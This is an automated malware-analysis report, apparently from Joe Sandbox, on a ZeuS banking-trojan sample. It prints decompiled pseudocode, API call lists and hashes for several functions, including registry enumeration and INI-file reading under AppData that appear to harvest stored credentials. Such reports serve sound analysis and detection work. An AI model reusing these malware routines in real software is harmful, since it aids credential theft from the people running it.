Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Path$CombineCountCreateDirectoryTempTick
String ID: %s%08x$tmp
API String ID: 1218007593-1196434543
Opcode ID: bb31670772de6c1eb392241ed9b70bb9287dd5ac4efaa5539050ac323ba3b127
Instruction ID: 139d025d2dd241ed87d6771c4b5f5ec639d4d71d2da21ef8c281398e2a7f987a
Opcode Fuzzy Hash: bb31670772de6c1eb392241ed9b70bb9287dd5ac4efaa5539050ac323ba3b127
Instruction Fuzzy Hash: 61F02D7120031466DA206A34DC05FEF7768C741718F180533FD95F61E1D27A8EE69A9F

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7F9, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A7F9(WCHAR* _a4) {
				signed int _t4;
				short _t9;
				signed short _t10;
				WCHAR* _t11;
				WCHAR* _t12;
				int _t18;

				_t12 = _a4;
				_t9 = 0;
				_t11 = PathSkipRootW(_t12);
				if(_t11 == 0) {
					_t11 = _t12;
				}
				while(1) {
					_t4 =  *_t11 & 0x0000ffff;
					if(_t4 == 0x5c || _t4 == 0x2f || _t4 == 0) {
						goto L5;
					}
					L11:
					_t11 =  &(_t11[1]);
					continue;
					L5:
					_t10 = _t4;
					 *_t11 = 0;
					if(GetFileAttributesW(_t12) == 0xffffffff) {
						_t18 = CreateDirectoryW(_t12, 0);
					}
					if(_t18 == 0) {
						L13:
						return _t9;
					} else {
						if(_t10 == 0) {
							_t9 = 1;
							goto L13;
						}
						 *_t11 = _t10;
						goto L11;
					}
				}
			}

0x0040a7fb
0x0040a802
0x0040a80a
0x0040a80e
0x0040a810
0x0040a810
0x0040a812
0x0040a812
0x0040a818
0x00000000
0x00000000
0x0040a850
0x0040a850
0x00000000
0x0040a824
0x0040a824
0x0040a829
0x0040a835
0x0040a840
0x0040a840
0x0040a846
0x0040a85a
0x0040a85d
0x0040a848
0x0040a84b
0x0040a855
0x00000000
0x0040a855
0x0040a84d
0x00000000
0x0040a84d
0x0040a846

APIs

PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,0040C9EF,?,?,?,?,?), ref: 0040A804
GetFileAttributesW.KERNEL32(?,?,00000000,0040C9EF,?,?,?,?,?), ref: 0040A82C
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0040C9EF,?,?,?,?,?), ref: 0040A83A

Strings

.exe, xrefs: 0040A800

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: AttributesCreateDirectoryFilePathRootSkip
String ID: .exe
API String ID: 4231520044-4119554291
Opcode ID: ed3e46544acc2824961a0ef503d825023dfcaf4f981307dc54091fb16494e904
Instruction ID: 33e2b0bd42c5d5e5787d7ff03aec3e0a0d4f1000ed751113e9a59a64727ec0fe
Opcode Fuzzy Hash: ed3e46544acc2824961a0ef503d825023dfcaf4f981307dc54091fb16494e904
Instruction Fuzzy Hash: 9FF0F6339403105AC6303A295848AB773D89E517A4B55C93BFCA4F73E0E7389C63926F

Uniqueness

Uniqueness Score: -1.00%

Function 004069ED, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004069ED(void* __ecx) {
				signed int _v8;
				struct HINSTANCE__* _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetModuleHandleW(L"kernel32.dll");
				if(_t7 == 0) {
					L4:
					return _t7 & 0xffffff00 | _v8 != 0x00000000;
				} else {
					_t7 = GetProcAddress(_t7, "IsWow64Process");
					if(_t7 == 0) {
						goto L4;
					} else {
						_t7 = _t7->i(0xffffffff,  &_v8);
						if(_t7 != 0) {
							goto L4;
						} else {
							return 0;
						}
					}
				}
			}

0x004069f1
0x004069fa
0x00406a02
0x00406a24
0x00406a2c
0x00406a04
0x00406a0a
0x00406a12
0x00000000
0x00406a14
0x00406a1a
0x00406a1e
0x00000000
0x00406a20
0x00406a23
0x00406a23
0x00406a1e
0x00406a12

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0041C23D,00000000,0041C766), ref: 004069FA
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00406A0A

Strings

IsWow64Process, xrefs: 00406A04
kernel32.dll, xrefs: 004069F5

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32.dll
API String ID: 1646373207-3024904723
Opcode ID: 00cc24325cc45010761ca123a02b10ec910306b1236abef4d389b43a25b1facf
Instruction ID: 0b0cfa3c612c614562886ec526036be26822eabab4639b6267781e256903af10
Opcode Fuzzy Hash: 00cc24325cc45010761ca123a02b10ec910306b1236abef4d389b43a25b1facf
Instruction Fuzzy Hash: 4DE04830350206B6DF109BA5DD06B9F76DCDB0D799F144675A011F60D0DB78DB149518

Uniqueness

Uniqueness Score: -1.00%

Function 00416C1F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416C1F(void* _a4) {
				void* __esi;
				int _t7;

				_t11 = _a4;
				_t7 = InternetCloseHandle(_a4);
				if(E0041CAA4() != 0) {
					EnterCriticalSection(0x423420);
					if(E00415D7F(_t11) != 0xffffffff) {
						E00415E42(_t5);
					}
					LeaveCriticalSection(0x423420);
				}
				return _t7;
			}

0x00416c21
0x00416c2c
0x00416c35
0x00416c3e
0x00416c4c
0x00416c4e
0x00416c4e
0x00416c54
0x00416c5a
0x00416c5f

APIs

InternetCloseHandle.WININET(?), ref: 00416C26

Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC

EnterCriticalSection.KERNEL32(00423420), ref: 00416C3E
LeaveCriticalSection.KERNEL32(00423420), ref: 00416C54

Part of subcall function 00415E42: CloseHandle.KERNEL32(?), ref: 00415E55

Strings

4B, xrefs: 00416C38

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CloseCriticalHandleSection$EnterInternetLeaveObjectSingleWait
String ID: 4B
API String ID: 51871400-3841215673
Opcode ID: 9c4065c2755f8b4a13e1f502e9a86cf31297799995a6daf2f4fbeb1a3d9ffbb3
Instruction ID: 4026f98f2cdf6062607bbe22f45a9c874cfbbf497fedaef4514eef2ca1097094
Opcode Fuzzy Hash: 9c4065c2755f8b4a13e1f502e9a86cf31297799995a6daf2f4fbeb1a3d9ffbb3
Instruction Fuzzy Hash: 81E026312015005B86017738AC884DF236CDD85339301827FF410F32718B3C8C82426D

Uniqueness

Uniqueness Score: -1.00%

Function 00414D5A, Relevance: 6.2, APIs: 4, Instructions: 184
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00414D5A(char* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				char _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v68;
				char _v88;
				char _v108;
				char _v132;
				char _v172;
				short _v260;
				short _v780;
				void* __edi;
				void* __esi;
				intOrPtr _t65;
				intOrPtr _t92;
				int _t104;
				void* _t110;
				intOrPtr _t112;
				void* _t115;
				int _t120;
				void* _t125;
				void* _t132;
				void* _t135;
				void* _t136;

				_t119 = __edx;
				_t118 = __ecx;
				_t120 = 0;
				E00405299( &_v32,  &_v32, 0, 8);
				_t65 = E004051B6(0xc1c);
				_v16 = _t65;
				if(_t65 == 0) {
					L22:
					if(_v28 <= _t120) {
						return E004051E6(_v32);
					}
					return E0041293E(_t119, _v32, 0xcb);
				} else {
					_v36 = _t65 + 0x3fc;
					_v48 = 0x80000001;
					_v44 = 0x80000002;
					E0040F34A(0x8a,  &_v260);
					E0040F34A(0x8b,  &_v88);
					E0040F34A(0x8c,  &_v132);
					E0040F34A(0x8d,  &_v68);
					E0040F34A(0x8e,  &_v108);
					_v12 = 0;
					do {
						if(RegOpenKeyExW( *(_t135 + _v12 * 4 - 0x2c),  &_v260, _t120, 8,  &_v8) != 0) {
							goto L20;
						}
						_v24 = _t120;
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _t120,  &_v780,  &_v20, _t120, _t120, _t120, _t120) != 0) {
							L19:
							RegCloseKey(_v8);
							goto L20;
						} else {
							goto L4;
						}
						L17:
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _v24,  &_v780,  &_v20, 0, 0, 0, 0) == 0) {
							L4:
							_t122 = _v16;
							_v24 = _v24 + 1;
							_t92 = E0040930A(_v8, _t118, _v16,  &_v780,  &_v88, 0xff);
							_v40 = _t92;
							if(_t92 != 0xffffffff && _t92 != 0) {
								_t132 = E0040930A(_v8, _t118, _t122 + 0x1fe,  &_v780,  &_v68, 0xff);
								if(_t132 != 0xffffffff && _t132 != 0) {
									_t124 = _v36;
									_t104 = E0040930A(_v8, _t118, _v36,  &_v780,  &_v108, 0xff);
									_v20 = _t104;
									if(_t104 != 0xffffffff && _t104 != 0 && E00414CA0(_t119, _t124, _t132 + _v40) > 0) {
										_t125 = E004093C0(_v8, _t118,  &_v780,  &_v132);
										if(_t125 < 1 || _t125 > 0xffff) {
											_t125 = 0x15;
										}
										_t134 =  &_v172;
										_t110 = 0x55;
										E0040F34A(_t110,  &_v172);
										_t112 = _v16;
										_t118 = _v36;
										_push(_t125);
										_push(_t112);
										_push(_t118);
										_push(_t112 + 0x1fe);
										_t119 = 0x311;
										_t126 = _t118 + 0x1fe;
										_t115 = E00405ED9(_t134, 0x311, _t118 + 0x1fe, _t134);
										_t136 = _t136 + 0x14;
										if(_t115 > 0) {
											_t118 =  &_v32;
											if(E004055DA(_t115,  &_v32, _t126) != 0) {
												_v28 = _v28 + 1;
											}
										}
									}
								}
							}
							goto L17;
						} else {
							_t120 = 0;
							goto L19;
						}
						L20:
						_v12 = _v12 + 1;
					} while (_v12 < 2);
					E004051E6(_v16);
					goto L22;
				}
			}

0x00414d5a
0x00414d5a
0x00414d68
0x00414d6f
0x00414d79
0x00414d7e
0x00414d83
0x00414f7c
0x00414f7f
0x00000000
0x00414f98
0x00000000
0x00414d89
0x00414d8e
0x00414d9c
0x00414da3
0x00414daa
0x00414db7
0x00414dc4
0x00414dd1
0x00414dde
0x00414de3
0x00414deb
0x00414e08
0x00000000
0x00000000
0x00414e21
0x00414e24
0x00414e33
0x00414f5e
0x00414f61
0x00000000
0x00000000
0x00000000
0x00000000
0x00414f30
0x00414f44
0x00414f56
0x00414e39
0x00414e39
0x00414e3c
0x00414e4e
0x00414e53
0x00414e59
0x00414e81
0x00414e86
0x00414e94
0x00414ea6
0x00414eab
0x00414eb1
0x00414ed7
0x00414edc
0x00414ee8
0x00414ee8
0x00414eeb
0x00414ef1
0x00414ef2
0x00414ef7
0x00414efa
0x00414efd
0x00414efe
0x00414eff
0x00414f05
0x00414f09
0x00414f0e
0x00414f14
0x00414f19
0x00414f1e
0x00414f21
0x00414f2b
0x00414f2d
0x00414f2d
0x00414f2b
0x00414f1e
0x00414eb1
0x00414e86
0x00000000
0x00414f5c
0x00414f5c
0x00000000
0x00414f5c
0x00414f67
0x00414f67
0x00414f6a
0x00414f77
0x00000000
0x00414f77

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 00414E00
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00414E2B
RegCloseKey.ADVAPI32(?), ref: 00414F61

Part of subcall function 0040930A: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041C0F5,?,?,00000104,.exe,00000000), ref: 0040931F

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 00414F4E

Part of subcall function 0040930A: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0041C0F5,?,?,00000104), ref: 004093A0

Part of subcall function 004093C0: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00415F8F,?,?), ref: 004093D8

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: f3240d822413627c5225ad033ed73e9df4a8cfaf27c4753abfc90ccb89456b65
Instruction ID: 60cc3da068c8a4770b33859c71885b65dc5d4fba704e26724153497e60cf3e94
Opcode Fuzzy Hash: f3240d822413627c5225ad033ed73e9df4a8cfaf27c4753abfc90ccb89456b65
Instruction Fuzzy Hash: 3C515172900118ABDB10DBD5DD45AEFB7BCEB88314F104176F905F7291D738AE868B64

Uniqueness

Uniqueness Score: -1.00%

Function 004152EE, Relevance: 6.2, APIs: 4, Instructions: 176
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004152EE(char* __ecx, void* __eflags) {
				void* _v8;
				int _v12;
				intOrPtr _v16;
				int* _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v116;
				short _v180;
				short _v700;
				void* __edi;
				void* __esi;
				intOrPtr _t55;
				int _t81;
				int _t89;
				int _t93;
				void* _t99;
				intOrPtr _t101;
				void* _t104;
				int* _t109;
				char* _t113;
				void* _t114;
				void* _t122;

				_t107 = __ecx;
				_t109 = 0;
				E00405299( &_v28,  &_v28, 0, 8);
				_t55 = E004051B6(0xc1c);
				_v16 = _t55;
				if(_t55 == 0) {
					return _t55;
				}
				_v32 = _t55 + 0x3fc;
				E0040F34A(0x97,  &_v180);
				E0040F34A(0x98,  &_v64);
				E0040F34A(0x99,  &_v76);
				E0040F34A(0x9a,  &_v52);
				E0040F34A(0x9b,  &_v40);
				if(RegOpenKeyExW(0x80000001,  &_v180, 0, 8,  &_v8) != 0) {
					L20:
					E004051E6(_v16);
					if(_v24 <= _t109) {
						return E004051E6(_v28);
					}
					return E0041293E(0x311, _v28, 0xcb);
				}
				_v20 = 0;
				_v12 = 0x104;
				if(RegEnumKeyExW(_v8, 0,  &_v700,  &_v12, 0, 0, 0, 0) != 0) {
					L19:
					RegCloseKey(_v8);
					goto L20;
				} else {
					do {
						_t111 = _v16;
						_v20 = _v20 + 1;
						_t81 = E0040930A(_v8, _t107, _v16,  &_v700,  &_v64, 0xff);
						_v12 = _t81;
						if(_t81 != 0xffffffff && _t81 != 0) {
							_t89 = E0040930A(_v8, _t107, _t111 + 0x1fe,  &_v700,  &_v52, 0xff);
							_v12 = _t89;
							if(_t89 != 0xffffffff && _t89 != 0) {
								_t113 = _v32;
								_t93 = E0040930A(_v8, _t107, _t113,  &_v700,  &_v40, 0xff);
								_v12 = _t93;
								if(_t93 != 0xffffffff && _t93 != 0) {
									_t107 = _t113;
									if(E00405D35(_t113) > 0) {
										_t114 = E004093C0(_v8, _t107,  &_v700,  &_v76);
										if(_t114 < 1 || _t114 > 0xffff) {
											_t114 = 0x15;
										}
										_t121 =  &_v116;
										_t99 = 0x55;
										E0040F34A(_t99,  &_v116);
										_t101 = _v16;
										_t107 = _v32;
										_push(_t114);
										_push(_t101);
										_push(_t107);
										_push(_t101 + 0x1fe);
										_t115 = _t107 + 0x1fe;
										_t104 = E00405ED9(_t121, 0x311, _t107 + 0x1fe, _t121);
										_t122 = _t122 + 0x14;
										if(_t104 > 0) {
											_t107 =  &_v28;
											if(E004055DA(_t104,  &_v28, _t115) != 0) {
												_v24 = _v24 + 1;
											}
										}
									}
								}
							}
						}
						_v12 = 0x104;
					} while (RegEnumKeyExW(_v8, _v20,  &_v700,  &_v12, 0, 0, 0, 0) == 0);
					_t109 = 0;
					goto L19;
				}
			}

0x004152ee
0x004152fc
0x00415303
0x0041530d
0x00415312
0x00415317
0x00415511
0x00415511
0x00415322
0x00415330
0x0041533d
0x0041534a
0x00415357
0x00415364
0x00415384
0x004154e4
0x004154e7
0x004154ef
0x00000000
0x00415508
0x00000000
0x004154fe
0x0041539d
0x004153a0
0x004153af
0x004154db
0x004154de
0x00000000
0x004153b5
0x004153ba
0x004153ba
0x004153bd
0x004153cf
0x004153d4
0x004153da
0x004153fd
0x00415402
0x00415408
0x00415416
0x00415428
0x0041542d
0x00415433
0x00415439
0x00415442
0x00415457
0x0041545c
0x00415468
0x00415468
0x0041546b
0x0041546e
0x0041546f
0x00415474
0x00415477
0x0041547a
0x0041547b
0x0041547c
0x00415482
0x0041548b
0x00415491
0x00415496
0x0041549b
0x0041549e
0x004154a8
0x004154aa
0x004154aa
0x004154a8
0x0041549b
0x00415442
0x00415433
0x00415408
0x004154c1
0x004154d1
0x004154d9
0x00000000
0x004154d9

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0041537C
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004153A7
RegCloseKey.ADVAPI32(?), ref: 004154DE

Part of subcall function 0040930A: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041C0F5,?,?,00000104,.exe,00000000), ref: 0040931F

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 004154CB

Part of subcall function 0040930A: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0041C0F5,?,?,00000104), ref: 004093A0

Part of subcall function 004093C0: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00415F8F,?,?), ref: 004093D8

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: 6bee3734de0677ff5cec88de0979f6cb701532c2cd88493491889831b0b5f261
Instruction ID: c7a608af6083e3b4fffc628faee5a2b520e57ed20c9f8653f7e3a3391f06ff90
Opcode Fuzzy Hash: 6bee3734de0677ff5cec88de0979f6cb701532c2cd88493491889831b0b5f261
Instruction Fuzzy Hash: AA513E72900508ABDB20DBA5DD45BEFB7BDEF84314F104176F905F3291EB38AA858B64

Uniqueness

Uniqueness Score: -1.00%

Function 0040F4E0, Relevance: 6.1, APIs: 4, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040F4E0(void* __eflags, intOrPtr _a4) {
				signed int _v5;
				short _v20;
				char _v40;
				char _v60;
				short _v84;
				char _v112;
				char _v144;
				short _v664;
				char _v1184;
				short _v1704;
				char _v2224;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t31;
				long _t33;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				long _t50;
				short* _t58;
				char* _t65;
				short _t66;
				void* _t67;
				WCHAR* _t70;
				long _t77;

				_t31 = 0x2a;
				E0040F34A(_t31,  &_v144);
				_t33 =  &_v1184;
				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t33);
				if(_t33 == 0) {
					_t33 = E0040AA77( &_v144,  &_v1184,  &_v1184);
					if(_t33 != 0) {
						_t36 = 0x2c;
						E0040F34A(_t36,  &_v112);
						_t33 = E0040AA77( &_v112,  &_v1704,  &_v1184);
						if(_t33 != 0) {
							_t33 = GetFileAttributesW( &_v1704);
							if(_t33 != 0xffffffff) {
								_t42 = 0x2d;
								E0040F34A(_t42,  &_v60);
								_t44 = 0x2e;
								E0040F34A(_t44,  &_v84);
								_t46 = 0x2f;
								E0040F34A(_t46,  &_v20);
								_v5 = 0;
								while(1) {
									_push(_v5 & 0x000000ff);
									_push( &_v60);
									_t67 = 0xa;
									_t70 =  &_v40;
									_t50 = E00405ED9( &_v60, _t67, _t70);
									if(_t50 < 1) {
										break;
									}
									_t50 = GetPrivateProfileIntW(_t70,  &_v84, 0xffffffff,  &_v1704);
									_t77 = _t50;
									if(_t77 == 0xffffffff) {
										break;
									}
									_t50 = GetPrivateProfileStringW(_t70,  &_v20, 0,  &_v664, 0x104,  &_v1704);
									if(_t50 == 0) {
										L17:
										_v5 = _v5 + 1;
										if(_v5 < 0xfa) {
											continue;
										}
										break;
									}
									_t58 =  &_v664;
									if(_v664 == 0) {
										L12:
										if(_t77 != 1) {
											_t65 =  &_v664;
											L16:
											_t50 = E0040F667(0, _t65, _a4, _t90);
											if(_t50 == 0) {
												break;
											}
											goto L17;
										}
										_t50 = E0040AA77( &_v664,  &_v2224,  &_v1184);
										_t90 = _t50;
										if(_t50 == 0) {
											goto L17;
										}
										_t65 =  &_v2224;
										goto L16;
									} else {
										goto L9;
									}
									do {
										L9:
										if( *_t58 == 0x2f) {
											_t66 = 0x5c;
											 *_t58 = _t66;
										}
										_t58 = _t58 + 2;
									} while ( *_t58 != 0);
									goto L12;
								}
								return _t50;
							}
						}
					}
				}
				return _t33;
			}

0x0040f4f3
0x0040f4f4
0x0040f4f9
0x0040f507
0x0040f50f
0x0040f51f
0x0040f526
0x0040f531
0x0040f532
0x0040f547
0x0040f54e
0x0040f55b
0x0040f564
0x0040f56f
0x0040f570
0x0040f57a
0x0040f57b
0x0040f585
0x0040f586
0x0040f58b
0x0040f58f
0x0040f593
0x0040f597
0x0040f59a
0x0040f59b
0x0040f59e
0x0040f5a8
0x00000000
0x00000000
0x0040f5be
0x0040f5c4
0x0040f5c9
0x00000000
0x00000000
0x0040f5ea
0x0040f5f2
0x0040f653
0x0040f653
0x0040f65a
0x00000000
0x00000000
0x00000000
0x0040f65a
0x0040f5f4
0x0040f601
0x0040f617
0x0040f61a
0x0040f641
0x0040f647
0x0040f64a
0x0040f651
0x00000000
0x00000000
0x00000000
0x0040f651
0x0040f630
0x0040f635
0x0040f637
0x00000000
0x00000000
0x0040f639
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f603
0x0040f603
0x0040f607
0x0040f60b
0x0040f60c
0x0040f60c
0x0040f60f
0x0040f612
0x00000000
0x0040f603
0x00000000
0x0040f660
0x0040f564
0x0040f54e
0x0040f526
0x0040f664

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 0040F507

Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0040F55B
GetPrivateProfileIntW.KERNEL32 ref: 0040F5BE
GetPrivateProfileStringW.KERNEL32 ref: 0040F5EA

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: PathPrivateProfile$AttributesCombineFileFolderString
String ID:
API String ID: 1702184609-0
Opcode ID: a360e97e2af6702cacecb7ea70354453c4d38694314016507e01586a9dd30884
Instruction ID: 436428556e4862b939cc1ff52f990e1e9d66d05e4b8a604e29f5c597d88d7f46
Opcode Fuzzy Hash: a360e97e2af6702cacecb7ea70354453c4d38694314016507e01586a9dd30884
Instruction Fuzzy Hash: BE419D72A00218AEDF20EAA48C45EDF737CAB05314F0045B7F644F75E1D779AE4A8B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B685, Relevance: 6.1, APIs: 4, Instructions: 86commemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004015B0,00000000,00004401,004015A0,?), ref: 0040B6AB
VariantInit.OLEAUT32(?), ref: 0040B6F7
SysAllocString.OLEAUT32(?), ref: 0040B707
VariantClear.OLEAUT32(?), ref: 0040B740

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Variant$AllocClearCreateInitInstanceString
String ID:
API String ID: 3126708813-0
Opcode ID: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
Instruction ID: 906cb429fc123d301df78eacb00a3d31e594a245a2abd642e2d5dc08f81e4d28
Opcode Fuzzy Hash: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
Instruction Fuzzy Hash: BB215E71900224AFCB119BA4CCC8EEF7BB8EF09750F0445B5F906FB291D7B599408BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1A9, Relevance: 6.1, APIs: 4, Instructions: 84
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B1A9(signed int __edx, void** __esi, void* _a4, signed int _a8) {
				char _v5;
				long _v12;
				void _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t26;
				signed int _t29;
				signed int _t46;
				void** _t48;

				_t48 = __esi;
				_t46 = __edx;
				_v5 = 0;
				if(_a8 <= 0xa00000) {
					_t26 = E0040A4F1( *__esi);
					_v36 = _t26;
					_v32 = _t46;
					if((_t26 & _t46) != 0xffffffff && E0040A4D1( *__esi, 0, 0, 2) != 0) {
						_t29 = E0040A4F1( *__esi);
						_v28 = _t29;
						_v24 = _t46;
						if((_t29 & _t46) != 0xffffffff) {
							E00405299( &_v20,  &_v20, 0, 5);
							_v20 = __esi[4] ^ _a8;
							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
								E0040A4D1( *_t48, _v28, _v24, 0);
								SetEndOfFile( *_t48);
							} else {
								_v5 = 1;
							}
						}
						FlushFileBuffers( *_t48);
						E0040A4D1( *_t48, _v36, _v32, 0);
					}
				}
				return _v5;
			}

0x0040b1a9
0x0040b1a9
0x0040b1ba
0x0040b1bd
0x0040b1c5
0x0040b1ca
0x0040b1cf
0x0040b1d5
0x0040b1f0
0x0040b1f5
0x0040b1fa
0x0040b200
0x0040b209
0x0040b21b
0x0040b22e
0x0040b260
0x0040b267
0x0040b251
0x0040b251
0x0040b251
0x0040b22e
0x0040b26f
0x0040b27e
0x0040b27e
0x0040b1d5
0x0040b289

APIs

Part of subcall function 0040A4F1: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,00000000,00000000), ref: 0040A506

Part of subcall function 0040A4D1: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,0040B182,?,00000000,00000000,00000000,00000000), ref: 0040A4E3

WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0040B22A
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 0040B243
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0040B267
FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0040B26F

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

